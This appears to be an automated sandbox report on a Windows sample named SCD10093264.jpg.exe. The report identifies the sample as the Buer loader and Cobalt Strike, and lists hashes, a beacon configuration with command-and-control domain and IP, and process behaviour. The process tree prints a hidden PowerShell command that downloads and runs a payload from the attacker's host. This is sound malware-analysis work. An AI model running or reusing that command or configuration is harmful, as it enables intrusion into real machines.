Resubmissions
12-02-2021 14:19
210212-d2eq66jkpe 1012-02-2021 13:05
210212-43tc7en5xn 1011-02-2021 21:45
210211-9zwb32kx8e 10Analysis
-
max time kernel
1800s -
max time network
1800s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
12-02-2021 14:19
Static task
static1
General
-
Target
SCD10093264.jpg.exe
-
Size
116KB
-
MD5
69819de123d7b83d5881932d706841f5
-
SHA1
27fe7625cb44c9870fdaf810ec42cb02a0191c86
-
SHA256
650750b450fd881501aa5a879696e9d61e8fcbbad479ce37b0a2bb081d73c209
-
SHA512
fdd8578698fbcd278ee0c6820d57b834fd20a9172d8652ddbfd02b12b8f8f63845af01401838ef9b8c342fab919c74da53e4062271c157eb5bfa67a22ec9b907
Malware Config
Extracted
http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe
Extracted
buer
antipublicwestbank.com
Extracted
cobaltstrike
http://wieubfavbrgaxyaadf.com:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
http://213.252.245.98:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
-
access_type
512
-
beacon_type
2048
-
create_remote_thread
0
-
day
0
-
dns_idle
0
-
dns_sleep
0
-
host
wieubfavbrgaxyaadf.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books,213.252.245.98,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
-
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAABAAAAAUSG9zdDogd3d3LmFtYXpvbi5jb20AAAAHAAAAAAAAAAMAAAACAAAADnNlc3Npb24tdG9rZW49AAAAAgAAAAxza2luPW5vc2tpbjsAAAABAAAALGNzbS1oaXQ9cy0yNEtVMTFCQjgyUlpTWUdKM0JES3wxNDE5ODk5MDEyOTk2AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAQAAAAFEhvc3Q6IHd3dy5hbWF6b24uY29tAAAACQAAAApzej0xNjB4NjAwAAAACQAAABFvZT1vZT1JU08tODg1OS0xOwAAAAcAAAAAAAAABQAAAAJzbgAAAAkAAAAGcz0zNzE3AAAACQAAACJkY19yZWY9aHR0cCUzQSUyRiUyRnd3dy5hbWF6b24uY29tAAAABwAAAAEAAAADAAAABAAAAAAAAA==
-
http_method1
GET
-
http_method2
POST
- injection_process
-
jitter
0
-
maxdns
255
-
month
0
- pipe_name
-
polling_time
5000
-
port_number
443
- proxy_password
- proxy_server
- proxy_username
-
sc_process32
%windir%\syswow64\rundll32.exe
-
sc_process64
%windir%\sysnative\rundll32.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYd1oQf060FSdDXzjBJqdlpV8YWyEYknN6Z9OBGmUfGC658UlUamK8rmhpR2H5ifIBvJq1FFRmC1P0KRYvvr731B3yvjDDiQR8z4PvUaIroO1g/i6BZZfoJRGl+LlUHFxzg+knc+irsSpjerv2BcnkZk3ajwFA2i/E6E2UtsWVHQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
4096
-
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown3
0
-
unknown4
0
-
unknown5
2.018915346e+09
-
uri
/N4215/adj/amzn.us.sr.aps
-
user_agent
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
-
year
0
Extracted
cobaltstrike
http://wieubfavbrgaxyaadf.com:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
http://213.252.245.98:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
-
access_type
512
-
beacon_type
2048
-
create_remote_thread
0
-
day
0
-
dns_idle
0
-
dns_sleep
0
-
host
wieubfavbrgaxyaadf.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books,213.252.245.98,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
-
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAABAAAAAUSG9zdDogd3d3LmFtYXpvbi5jb20AAAAHAAAAAAAAAAMAAAACAAAADnNlc3Npb24tdG9rZW49AAAAAgAAAAxza2luPW5vc2tpbjsAAAABAAAALGNzbS1oaXQ9cy0yNEtVMTFCQjgyUlpTWUdKM0JES3wxNDE5ODk5MDEyOTk2AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAQAAAAFEhvc3Q6IHd3dy5hbWF6b24uY29tAAAACQAAAApzej0xNjB4NjAwAAAACQAAABFvZT1vZT1JU08tODg1OS0xOwAAAAcAAAAAAAAABQAAAAJzbgAAAAkAAAAGcz0zNzE3AAAACQAAACJkY19yZWY9aHR0cCUzQSUyRiUyRnd3dy5hbWF6b24uY29tAAAABwAAAAEAAAADAAAABAAAAAAAAA==
-
http_method1
GET
-
http_method2
POST
- injection_process
-
jitter
0
-
maxdns
255
-
month
0
- pipe_name
-
polling_time
5000
-
port_number
443
- proxy_password
- proxy_server
- proxy_username
-
sc_process32
%windir%\syswow64\rundll32.exe
-
sc_process64
%windir%\sysnative\rundll32.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYd1oQf060FSdDXzjBJqdlpV8YWyEYknN6Z9OBGmUfGC658UlUamK8rmhpR2H5ifIBvJq1FFRmC1P0KRYvvr731B3yvjDDiQR8z4PvUaIroO1g/i6BZZfoJRGl+LlUHFxzg+knc+irsSpjerv2BcnkZk3ajwFA2i/E6E2UtsWVHQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
4096
-
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown3
0
-
unknown4
0
-
unknown5
2.018915346e+09
-
uri
/N4215/adj/amzn.us.sr.aps
-
user_agent
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
-
year
0
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Buer Loader 1 IoCs
Detects Buer loader in memory or disk.
resource yara_rule behavioral1/memory/3452-4-0x0000000040000000-0x000000004000A000-memory.dmp buer -
Blocklisted process makes network request 64 IoCs
flow pid Process 24 3880 powershell.exe 25 3880 powershell.exe 26 3880 powershell.exe 27 3880 powershell.exe 28 3880 powershell.exe 29 3880 powershell.exe 30 3880 powershell.exe 31 3880 powershell.exe 32 3880 powershell.exe 33 3880 powershell.exe 34 3880 powershell.exe 35 3880 powershell.exe 36 3880 powershell.exe 38 3880 powershell.exe 40 3880 powershell.exe 42 3880 powershell.exe 44 3880 powershell.exe 46 3880 powershell.exe 48 3880 powershell.exe 50 3880 powershell.exe 52 3880 powershell.exe 54 3880 powershell.exe 56 3880 powershell.exe 58 3880 powershell.exe 60 3880 powershell.exe 62 3880 powershell.exe 64 3880 powershell.exe 66 3880 powershell.exe 68 3880 powershell.exe 70 3880 powershell.exe 72 3880 powershell.exe 74 3880 powershell.exe 76 3880 powershell.exe 78 3880 powershell.exe 80 3880 powershell.exe 82 3880 powershell.exe 84 3880 powershell.exe 86 3880 powershell.exe 88 3880 powershell.exe 90 3880 powershell.exe 92 3880 powershell.exe 94 3880 powershell.exe 96 3880 powershell.exe 98 3880 powershell.exe 100 3880 powershell.exe 102 3880 powershell.exe 104 3880 powershell.exe 106 3880 powershell.exe 108 3880 powershell.exe 110 3880 powershell.exe 112 3880 powershell.exe 114 3880 powershell.exe 116 3880 powershell.exe 118 3880 powershell.exe 120 3880 powershell.exe 122 3880 powershell.exe 124 3880 powershell.exe 126 3880 powershell.exe 128 3880 powershell.exe 130 3880 powershell.exe 132 3880 powershell.exe 134 3880 powershell.exe 136 3880 powershell.exe 138 3880 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 3992 SCD10093264.jpg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: SCD10093264.jpg.exe File opened (read-only) \??\O: SCD10093264.jpg.exe File opened (read-only) \??\P: SCD10093264.jpg.exe File opened (read-only) \??\T: SCD10093264.jpg.exe File opened (read-only) \??\U: SCD10093264.jpg.exe File opened (read-only) \??\X: SCD10093264.jpg.exe File opened (read-only) \??\E: SCD10093264.jpg.exe File opened (read-only) \??\G: SCD10093264.jpg.exe File opened (read-only) \??\Z: SCD10093264.jpg.exe File opened (read-only) \??\S: SCD10093264.jpg.exe File opened (read-only) \??\V: SCD10093264.jpg.exe File opened (read-only) \??\Y: SCD10093264.jpg.exe File opened (read-only) \??\N: SCD10093264.jpg.exe File opened (read-only) \??\Q: SCD10093264.jpg.exe File opened (read-only) \??\H: SCD10093264.jpg.exe File opened (read-only) \??\A: SCD10093264.jpg.exe File opened (read-only) \??\F: SCD10093264.jpg.exe File opened (read-only) \??\K: SCD10093264.jpg.exe File opened (read-only) \??\L: SCD10093264.jpg.exe File opened (read-only) \??\M: SCD10093264.jpg.exe File opened (read-only) \??\R: SCD10093264.jpg.exe File opened (read-only) \??\W: SCD10093264.jpg.exe File opened (read-only) \??\B: SCD10093264.jpg.exe File opened (read-only) \??\I: SCD10093264.jpg.exe -
Suspicious use of SetThreadContext 12 IoCs
description pid Process procid_target PID 3992 set thread context of 3452 3992 SCD10093264.jpg.exe 77 PID 2396 set thread context of 3136 2396 svchost.exe 86 PID 2396 set thread context of 3856 2396 svchost.exe 87 PID 2396 set thread context of 1088 2396 svchost.exe 88 PID 2396 set thread context of 1836 2396 svchost.exe 89 PID 2396 set thread context of 3284 2396 svchost.exe 90 PID 2396 set thread context of 1112 2396 svchost.exe 91 PID 2396 set thread context of 2888 2396 svchost.exe 92 PID 2396 set thread context of 1516 2396 svchost.exe 93 PID 2396 set thread context of 4780 2396 svchost.exe 94 PID 2396 set thread context of 1624 2396 svchost.exe 95 PID 2396 set thread context of 5800 2396 svchost.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 816 3452 WerFault.exe 77 -
Modifies data under HKEY_USERS 16 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed lsass.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3880 powershell.exe 3880 powershell.exe 3880 powershell.exe 3880 powershell.exe 3880 powershell.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe 3136 rundll32.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3992 SCD10093264.jpg.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3880 powershell.exe Token: SeRestorePrivilege 816 WerFault.exe Token: SeBackupPrivilege 816 WerFault.exe Token: SeDebugPrivilege 816 WerFault.exe Token: SeDebugPrivilege 3136 rundll32.exe Token: SeDebugPrivilege 1088 rundll32.exe Token: SeDebugPrivilege 1836 rundll32.exe Token: SeIncreaseQuotaPrivilege 632 lsass.exe Token: SeSecurityPrivilege 632 lsass.exe Token: SeTakeOwnershipPrivilege 632 lsass.exe Token: SeLoadDriverPrivilege 632 lsass.exe Token: SeSystemProfilePrivilege 632 lsass.exe Token: SeSystemtimePrivilege 632 lsass.exe Token: SeProfSingleProcessPrivilege 632 lsass.exe Token: SeIncBasePriorityPrivilege 632 lsass.exe Token: SeCreatePagefilePrivilege 632 lsass.exe Token: SeBackupPrivilege 632 lsass.exe Token: SeRestorePrivilege 632 lsass.exe Token: SeShutdownPrivilege 632 lsass.exe Token: SeDebugPrivilege 632 lsass.exe Token: SeSystemEnvironmentPrivilege 632 lsass.exe Token: SeRemoteShutdownPrivilege 632 lsass.exe Token: SeUndockPrivilege 632 lsass.exe Token: SeManageVolumePrivilege 632 lsass.exe Token: 33 632 lsass.exe Token: 34 632 lsass.exe Token: 35 632 lsass.exe Token: 36 632 lsass.exe Token: SeIncreaseQuotaPrivilege 632 lsass.exe Token: SeSecurityPrivilege 632 lsass.exe Token: SeTakeOwnershipPrivilege 632 lsass.exe Token: SeLoadDriverPrivilege 632 lsass.exe Token: SeSystemProfilePrivilege 632 lsass.exe Token: SeSystemtimePrivilege 632 lsass.exe Token: SeProfSingleProcessPrivilege 632 lsass.exe Token: SeIncBasePriorityPrivilege 632 lsass.exe Token: SeCreatePagefilePrivilege 632 lsass.exe Token: SeBackupPrivilege 632 lsass.exe Token: SeRestorePrivilege 632 lsass.exe Token: SeShutdownPrivilege 632 lsass.exe Token: SeDebugPrivilege 632 lsass.exe Token: SeSystemEnvironmentPrivilege 632 lsass.exe Token: SeRemoteShutdownPrivilege 632 lsass.exe Token: SeUndockPrivilege 632 lsass.exe Token: SeManageVolumePrivilege 632 lsass.exe Token: 33 632 lsass.exe Token: 34 632 lsass.exe Token: 35 632 lsass.exe Token: 36 632 lsass.exe Token: SeIncreaseQuotaPrivilege 632 lsass.exe Token: SeSecurityPrivilege 632 lsass.exe Token: SeTakeOwnershipPrivilege 632 lsass.exe Token: SeLoadDriverPrivilege 632 lsass.exe Token: SeSystemProfilePrivilege 632 lsass.exe Token: SeSystemtimePrivilege 632 lsass.exe Token: SeProfSingleProcessPrivilege 632 lsass.exe Token: SeIncBasePriorityPrivilege 632 lsass.exe Token: SeCreatePagefilePrivilege 632 lsass.exe Token: SeBackupPrivilege 632 lsass.exe Token: SeRestorePrivilege 632 lsass.exe Token: SeShutdownPrivilege 632 lsass.exe Token: SeDebugPrivilege 632 lsass.exe Token: SeSystemEnvironmentPrivilege 632 lsass.exe Token: SeRemoteShutdownPrivilege 632 lsass.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 3992 wrote to memory of 3452 3992 SCD10093264.jpg.exe 77 PID 3992 wrote to memory of 3452 3992 SCD10093264.jpg.exe 77 PID 3992 wrote to memory of 3452 3992 SCD10093264.jpg.exe 77 PID 3992 wrote to memory of 3452 3992 SCD10093264.jpg.exe 77 PID 3452 wrote to memory of 3980 3452 SCD10093264.jpg.exe 79 PID 3452 wrote to memory of 3980 3452 SCD10093264.jpg.exe 79 PID 3452 wrote to memory of 3980 3452 SCD10093264.jpg.exe 79 PID 3452 wrote to memory of 4012 3452 SCD10093264.jpg.exe 81 PID 3452 wrote to memory of 4012 3452 SCD10093264.jpg.exe 81 PID 3452 wrote to memory of 4012 3452 SCD10093264.jpg.exe 81 PID 4012 wrote to memory of 3880 4012 cmd.exe 83 PID 4012 wrote to memory of 3880 4012 cmd.exe 83 PID 4012 wrote to memory of 3880 4012 cmd.exe 83 PID 3880 wrote to memory of 2396 3880 powershell.exe 31 PID 2396 wrote to memory of 3136 2396 svchost.exe 86 PID 2396 wrote to memory of 3136 2396 svchost.exe 86 PID 2396 wrote to memory of 3136 2396 svchost.exe 86 PID 2396 wrote to memory of 3856 2396 svchost.exe 87 PID 2396 wrote to memory of 3856 2396 svchost.exe 87 PID 2396 wrote to memory of 3856 2396 svchost.exe 87 PID 2396 wrote to memory of 1088 2396 svchost.exe 88 PID 2396 wrote to memory of 1088 2396 svchost.exe 88 PID 2396 wrote to memory of 1088 2396 svchost.exe 88 PID 1088 wrote to memory of 632 1088 rundll32.exe 1 PID 1088 wrote to memory of 632 1088 rundll32.exe 1 PID 2396 wrote to memory of 1836 2396 svchost.exe 89 PID 2396 wrote to memory of 1836 2396 svchost.exe 89 PID 2396 wrote to memory of 1836 2396 svchost.exe 89 PID 2396 wrote to memory of 3284 2396 svchost.exe 90 PID 2396 wrote to memory of 3284 2396 svchost.exe 90 PID 2396 wrote to memory of 3284 2396 svchost.exe 90 PID 2396 wrote to memory of 1112 2396 svchost.exe 91 PID 2396 wrote to memory of 1112 2396 svchost.exe 91 PID 2396 wrote to memory of 1112 2396 svchost.exe 91 PID 2396 wrote to memory of 2888 2396 svchost.exe 92 PID 2396 wrote to memory of 2888 2396 svchost.exe 92 PID 2396 wrote to memory of 2888 2396 svchost.exe 92 PID 2396 wrote to memory of 1516 2396 svchost.exe 93 PID 2396 wrote to memory of 1516 2396 svchost.exe 93 PID 2396 wrote to memory of 1516 2396 svchost.exe 93 PID 2396 wrote to memory of 4780 2396 svchost.exe 94 PID 2396 wrote to memory of 4780 2396 svchost.exe 94 PID 2396 wrote to memory of 4780 2396 svchost.exe 94 PID 2396 wrote to memory of 1624 2396 svchost.exe 95 PID 2396 wrote to memory of 1624 2396 svchost.exe 95 PID 2396 wrote to memory of 1624 2396 svchost.exe 95 PID 632 wrote to memory of 2888 632 lsass.exe 92 PID 2396 wrote to memory of 5800 2396 svchost.exe 96 PID 2396 wrote to memory of 5800 2396 svchost.exe 96 PID 2396 wrote to memory of 5800 2396 svchost.exe 96
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:632
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵PID:3856
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1088
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵PID:3284
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵PID:1112
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵PID:2888
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵PID:1516
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵PID:4780
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵PID:1624
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe2⤵PID:5800
-
-
C:\Users\Admin\AppData\Local\Temp\SCD10093264.jpg.exe"C:\Users\Admin\AppData\Local\Temp\SCD10093264.jpg.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Users\Admin\AppData\Local\Temp\SCD10093264.jpg.exe"C:\Users\Admin\AppData\Local\Temp\SCD10093264.jpg.exe"2⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" ('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"3⤵PID:3980
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"3⤵
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3880
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3452 -s 207923⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816
-
-